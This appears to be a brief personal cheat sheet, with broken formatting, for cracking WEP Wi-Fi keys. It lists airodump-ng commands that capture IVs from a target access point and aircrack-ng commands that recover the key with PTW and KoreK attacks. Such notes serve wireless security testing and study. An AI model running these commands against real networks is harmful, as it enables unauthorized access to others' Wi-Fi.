capture traffic
...
and simply wireshark against the .cap
file
mkdir -p ~/crack/ cd ~/crack/ echo $mac echo $chan echo $ssid rm -f $ssid.ivs-* airodump-ng --manufacturer --uptime --wps -a --bssid $mac \ --channel $chan \ --essid $ssid \ --ivs --write $ssid wlan0mon ls -lhF *.ivs
maybe there is no need to define AP’s mac address as one could get IVs from various ones with same SSID?
Make sure you’ve got enough IVs. TODO how to beforehand? Aircrack-ng will tell anyways.
WEP PSK cracking by means of PTW (-1
) then Korek (-K
)
aircrack-ng --simd-list aircrack-ng -a 1 -p 4 -1 -c -n 64 -s ivs-*.cap aircrack-ng -a 1 -p 4 -K -c -n 64 -s ivs-*.cap